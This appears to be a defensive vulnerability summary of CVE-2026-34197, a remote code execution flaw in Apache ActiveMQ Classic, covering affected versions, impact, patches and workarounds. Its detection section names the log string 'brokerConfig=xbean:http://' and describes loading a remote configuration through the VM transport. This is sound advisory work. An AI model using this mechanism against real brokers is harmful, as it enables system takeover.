Full Report
Nonprofit security organization Shadowserver found that over 6,400 Apache ActiveMQ servers exposed online are vulnerable to ongoing attacks exploiting a high-severity code injection vulnerability. [...]
Analysis Summary
# Vulnerability: Remote Code Execution in Apache ActiveMQ (Jolokia/XBean)
## CVE Details
- **CVE ID**: CVE-2026-34197
- **CVSS Score**: High (Specific numerical score not provided in text, but categorized as high-severity/RCE)
- **CWE**: Improper Input Validation leading to Code Injection
## Affected Systems
- **Products**: Apache ActiveMQ Classic
- **Versions**: Versions prior to 6.2.3 and 5.19.4 (Note: Flaw existed for 13 years)
- **Configurations**: Systems running the Jolokia management component or with accessible internal transport protocols.
## Vulnerability Description
The flaw is a code injection vulnerability stemming from improper input validation. Specifically, it involves the handling of the internal transport protocol `VM` and the `brokerConfig` parameter. Authenticated threat actors can leverage this weakness to inject malicious configurations (via xbean:http), leading to remote code execution (RCE) on the host system.
## Exploitation
- **Status**: **Exploited in the wild**. Proof of Concept (PoC) methods are well-known, and CISA has added it to the Known Exploited Vulnerabilities (KEV) catalog.
- **Complexity**: Low (Methods for exploitation are described as well-known/well-documented).
- **Attack Vector**: Network (Requires authentication).
## Impact
- **Confidentiality**: High (Full system access possible via RCE)
- **Integrity**: High (Ability to modify broker configurations and execute arbitrary commands)
- **Availability**: High (Potential for complete system takeover or service disruption)
## Remediation
### Patches
Update to the following versions or newer:
- **Apache ActiveMQ Classic 6.2.3**
- **Apache ActiveMQ Classic 5.19.4**
### Workarounds
- Restrict network access to the ActiveMQ management console.
- Follow CISA BOD 22-01 guidance for cloud services or discontinue use if patching is not immediately feasible.
## Detection
- **Indicators of Compromise (IoCs)**: Scan broker logs for suspicious connection strings utilizing the internal transport protocol `VM`.
- **Detection Query**: Look for the string `brokerConfig=xbean:http://` in logs, which indicates an attempt to load a remote configuration file.
- **Monitoring**: Shadowserver actively tracks exposed, vulnerable fingerprints (over 6,400 instances currently online).
## References
- **Vendor Advisory**: [http[:]//activemq.apache.org/security-advisories.data/CVE-2026-34197-announcement.txt]
- **Horizon3 Research**: [https[:]//horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/]
- **NVD**: [http[:]//nvd.nist.gov/vuln/detail/CVE-2026-34197]
- **CISA KEV Catalog**: [https[:]//www.cisa.gov/known-exploited-vulnerabilities-catalog]
- **Shadowserver Statistics**: [https[:]//dashboard.shadowserver.org/statistics/combined/time-series/?tag=cve-2026-34197]